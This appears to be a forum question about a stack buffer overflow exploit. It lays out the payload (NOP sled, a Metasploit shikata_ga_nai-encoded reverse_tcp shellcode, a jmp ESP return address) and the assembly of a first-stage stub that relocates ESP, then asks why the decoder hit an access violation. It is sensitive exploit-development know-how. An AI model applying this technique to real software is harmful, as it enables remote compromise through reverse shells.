BufferOverflow : ESP and access violation
The context :
I have a small question regarding ESP and access violation. I just exploited a buffer overflow, with little space after ESP. So i did this :
part 1 : NOP SLED
part 2 : my shellcode : a shikata_ga_nai encoded reverse_tcp payload, by metasploit
part 3 : some more NOP to fill the space
part 4 : 4 bytes overwriting the EIP saved in the stack. This is the address of a jump ESP instruction in a non ASLS protected segment.
part 5 : [This is where ESP point to at the moment of the crash] I have some NOP
part 6 : the first stage of my exploit :
for the first stage, avoiding \x00 bytes, I did :
mov eax,esp
sub eax,944 (point to the part1 : the NOP sled)
jmp eax
It worked fine : stack is overwritten, EIP goes to the jmp ESP instruction, arrives in the part 6 of the exploit, it jumps to EAX, wich point to the part 1 of the exploit, and then executes the NOP to arrive to the shellcode.
problem : I got some access violation inside the shikata_ga_nai decoder.
I solved it, adding a mov esp,eax in the first stage :
mov eax,esp
sub eax,944 (point to the part1 : the NOP sled)
mov esp,eax
jmp esp
And it worked like a charm. So that would means one can not play with the memory in lower addresses than ESP.
The question :
Does ESP really has anything to do with read/write permission inside (outside actually) the stack ? The memory there was allocated, so I used it. Has EBP or other register anything to do with access violation ?
